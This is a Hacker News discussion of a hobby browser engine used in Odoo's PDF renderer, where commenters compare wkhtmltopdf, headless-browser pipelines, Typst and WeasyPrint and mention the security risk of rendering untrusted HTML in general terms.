Hacker News

What’s the long term goal of this project beyond learning? Building a browser to support the modern web is a humongous work IMHO.

monax 2 days ago [ - ]

The main goal is great support for static documents rendering as it's being used at the core of the paper-muncher [1] PDF rendering engine, meant to replace wkhtmltopdf at odoo. But we don't exclude general web browsing and JavaScript support at some point.

[1] https://github.com/odoo/paper-muncher

dmkolobov 2 days ago [ - ]

Ooh blast from the past!

At a previous company we moved off of wkhtmltopdf to a nodejs service which received static html and rendered it to pdf using phantomjs. These days you probably use puppeteer.

The trick was keeping the page context open to avoid chrome startup costs and recreating `page`. The node service would initialize a page object once with a script inside which would communicate with the server via a named Linux pipe. Then, for each request:

1. node service sends the static html to the page over the pipe

2. the page script receives the html from the pipe, inserts it into the DOM, and sends an “ack” back over the pipe

3. the node service receives the “ack” and calls the pdf rendering method on the page.

I don’t remember why we chose the pipe method: I’m sure there’s a better way to pass data to headless contexts these days.

The whole thing was super fast(~20ms) compared to WK, which took at least 30 seconds for us, and would more often than not just time out.

sshine 2 days ago [ - ]

Sounds like fun considering how real the problem is.

dmkolobov 2 days ago [ - ]

It was!

I remember the afternoon I had the idea: it was beer Friday -and it took a few hours to write up a basic prototype that rendered a PDF in a few hundred milliseconds. That was the first time I’d written a 100x speed improvement. Felt like a real rush.

mherrmann 2 days ago [ - ]

Congratulations. Doesn't make this approach make so much more sense than writing a browser engine from scratch?

dmkolobov a day ago [ - ]

Maybe? I'd say it depends on what you're rendering. We rendered HTML that we created ourselves, filled in with data that we parsed and validated. Styles across the documents generated were also largely the same.

If your job is to render arbitrary user HTML, this could get much more hairy. First of all, print rendering at the time(and probably now) was notoriously finicky. Things like adjusting colors, improper rendering of SVGs, pagination were difficult. It took a lot of effort to get right.

Furthermore, if you're sending arbitrary HTML, you now have a much larger security exploit surface. If someone figures out how to call `addEventListener` within the page context, they can snoop on every PDF generated by that page.

giovannibonetti 2 days ago [ - ]

At work we recently switched from Wkhtmltopdf to Typst, which is a breath of fresh air. It is very fast and generates PDFs from scratch without needing to involve HTML or a browser engine. It is implemented in Rust and distributed as a self-contained binary.

This blog post convinced us that the switch was worth it: https://zerodha.tech/blog/1-5-million-pdfs-in-25-minutes/

stevage 2 days ago [ - ]

Oh interesting. I use their "old stack" for a couple of much smaller projects and it works fine, but it does seem a bit ridiculous to be starting up a whole chrome instance just to convert one file format to another.

karteum 2 days ago [ - ]

I also love Typst and use it regularly. But just to note it : there is also https://weasyprint.org that takes HTML as input

Teever 2 days ago [ - ]

So cool to see Odoo mentioned on HN. I've worked with it before and like it a lot.

I've made posts about it on HN before but they've never gained traction. I hope that this takes off.

You guys make neat software.

kabes 2 days ago [ - ]

Does it support page margin boxes?

monax 2 days ago [ - ]

Yes !

pierrelf 2 days ago [ - ]

Looks like skift is a hobby os like Serenity OS which Ladybird is spun out from. Maybe they intend to follow the same path?

monax 2 days ago [ - ]

I intend to keep Skift and Vaev together for as long as possible since everything is meant to be cross-platform. I don’t see any architectural conflict that would motivate such a change.